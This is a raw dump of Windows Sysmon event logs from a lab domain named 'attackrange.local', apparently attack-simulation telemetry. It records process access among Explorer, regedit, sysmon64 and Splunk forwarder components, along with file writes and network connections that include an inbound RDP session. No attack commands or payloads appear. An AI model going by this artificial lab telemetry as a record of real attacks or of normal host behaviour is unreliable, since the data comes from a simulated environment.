08:06:23.989{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.989{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.957{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveMD5=5EF2E2A54532F329FE4B0E510706DA92,SHA256=9A1681E1F311D3204823DF2868E6B56D99A019D2EA79C92CF41688C2DF220B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:23.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=015F5EA071D626C461AFE149DD0635A6,SHA256=61EF32EF07195B44BE619E2CA8BD8803CB9326C99133647FCA59E9909CEA89B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:21.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57445-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000810114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.985{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.985{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.970{0C1E0330-F800-60EB-D679-00000000D001}3420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.860{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA54C6F9EA440D46D3CF2971280C0926,SHA256=74836F95A8B9861BF7A604F1BF6181F0E5B9C13EFF36359552D14789F2DBAAD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:15.307{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse45.141.87.27-29158-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:24.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB961022CED7A8368059DE2E2904954E,SHA256=2A62E3FE6E80B577E0B0674D0EF961706C6DA7B6F3ECE945CB6D50A6DCC53121,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.485{0C1E0330-F800-60EB-D579-00000000D001}36083684C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F800-60EB-D579-00000000D001}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:24.298{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 